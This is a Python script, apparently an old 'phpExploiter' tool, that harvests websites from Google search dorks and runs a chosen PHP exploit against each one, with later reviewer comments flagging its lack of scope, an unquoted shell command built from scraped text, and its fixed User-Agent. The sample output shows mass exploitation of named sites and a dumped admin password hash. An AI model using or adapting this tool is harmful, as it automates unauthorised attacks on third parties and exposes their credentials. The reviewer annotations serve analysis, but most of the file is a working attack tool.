#!/usr/bin/python
#This tool takes queries, uses google to retrieve 
#hosts then exploits them. It's set up for rgod type
#php exploits, found @ milw0rm.com/author/2415. 
#This saves a lot of time copying and pasting sites to 
#your terminal. Takes a few arguments, look at bottom
#for more details and example. Email me if you want one
#set up differently or anything else...
#
#d3hydr8[at]gmail[dot]com

import urllib2, sys, re, commands, getopt, StringIO, string

def gethosts():
	#Fetch Google result pages for the global `query` and return a
	#de-duplicated list of host/path strings pulled out of the HTML.
	#Reads the module-level globals `query` and `num`, which are assigned
	#by the argument handling at the bottom of the file.
	#NOTE(review): nothing in this function limits the returned list to an
	#agreed scope; every string that survives the filter below is returned.
	
	counter =  10
	hits = []
	
	#`counter` is used as the Google `start=` offset, stepped by 10 while
	#it is below `num`.
	while counter < num:
		#`query` is concatenated into the URL exactly as given on the command line.
		url = 'http://www.google.com/search?hl=en&q=%22'+query+'%22&hl=en&lr=&start='+repr(counter)+'&sa=N'
		opener = urllib2.build_opener(url)
		#The same User-Agent string is sent on every request; a constant value
		#like this is something an egress proxy log can be searched for.
		opener.addheaders = [('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')]
		data = opener.open(url).readlines()
		for line in data:
			#Loose pattern: dotted host-like text followed by path-like segments.
			hit = re.findall("\w+\.\w+\.?\w+./?\w+./?\w+./", line)
			for x in hit:
				if x != []:
					#Discard matches containing "(", "<" or "google". The author
					#notes that a tighter regex could replace this filter.
					if re.search(r'\(', x) or re.search("<", x) or re.search("google", x): pass
					else: 
						if x not in hits: hits.append(x)
													
		counter += 10
	print "\n\tLoaded",len(hits),"hosts to exploit...\n"
	return hits
			
def exploiter(hits):
	#Run the PHP script named by the global `ex` once for each entry in
	#`hits` and print the output lines that match the global `success`.
	
	#Check that the script path can be opened before starting. The file
	#object returned by open() is not kept or closed.
	try:
  		open(ex)
	except(IOError), msg: 
  		print "Error:",msg
		print "Check your exploit path.\n"
  		sys.exit(1)
	
	for host in hits:
		print "[ Exploiting",host,"]"
		#Turn "host/path/" into "host /path/" at the first slash and drop the
		#first-found "www." text, so host and path become separate arguments.
		host = host.replace('/'," /",1).replace('www.',"")
		#NOTE(review): the command line is built by plain string concatenation
		#and commands.getstatusoutput() passes it to a shell. `host` originates
		#from scraped search-result HTML and `ex` from argv; neither is quoted,
		#so any shell metacharacter they contain is interpreted on the machine
		#running this script.
		x = StringIO.StringIO(commands.getstatusoutput('php '+ex+' '+host+' ls -la ')[1]).readlines()
		for line in x:
			#`success` is handed to re.search() as a pattern rather than a
			#literal, so characters such as "." act as regex metacharacters.
			if re.search(success.lower(), line.lower()):
				print host ,line
			#This branch runs for every non-matching output line, not once per host.
			else: print "\n\tExploit failed...\n"
	
#................................................
	
#Command-line entry point: exactly four arguments are required, otherwise
#the usage text is printed and the script exits with status 1.
if len(sys.argv) != 5:
	print "\n\t   d3hydr8[at]gmail[dot]com phpExploiter v1.0"
	print "\t--------------------------------------------------\n"
	print "Usage ./phpex.py <query> <num of hosts> <exploit> <success string>"
	print "ex: ./phpex.py inurl:/geeklog/ 200 geeklog.php 'Hi Master'\n"
	#The success string is what would be printed if the exploit was successful; you can
	#usually find it at the bottom of the exploit. ex: "Exploit succeeded..."
	#This tool also works better if you edit out all the extra junk that's printed by the
	#exploit if it fails (echos). If your query has spaces like "Powered by Something", add +
	#symbols to help the search, "Powered+by+Something" for example.
	#NOTE(review): the sample queries pick sites by strings a search engine has
	#indexed (a product path, a "Powered by" footer), so that indexed banner or
	#path is the exposure this workflow relies on.
	sys.exit(1)
else:
	#These four names become module-level globals; gethosts() reads `query`
	#and `num`, exploiter() reads `ex` and `success`.
	query = sys.argv[1]
	#int() raises ValueError on a non-numeric count and it is not caught here.
	num = int(sys.argv[2])
	ex = sys.argv[3]
	success = sys.argv[4]
	print "\n\t   d3hydr8[at]gmail[dot]com phpExploiter v1.0"
	print "\t--------------------------------------------------\n"
	print "\nQuerying google for hosts...\n"
	print "[ time depends on your number:",num,"]\n"
	exploiter(gethosts())
	
"""Examples:
	
sh-3.00$ ./goog-test.py Powered+by+Plogger 400 /home/d3hydr8/plogger.php "Exploit succeeded..."

           d3hydr8[at]gmail[dot]com phpExploiter v1.0
        --------------------------------------------------


        Loaded 119 hosts to exploit...

[ Exploiting classicrock.com/gallery/ ]

 Exploit succeeded...

classicrock.com /gallery/ Admin password hash -> d53c45633f5891a95aa5838a4bea7d3f

sh-3.00$ ./phpex.py Powered+by+Geeklog 100 /home/d3hydr8/geeklog.php "Hi Master"

           d3hydr8[at]gmail[dot]com phpExploiter v1.0
        --------------------------------------------------


        Loaded 140 hosts to exploit...

[ Exploiting www.techography.com/ ]

        Exploit failed...


"""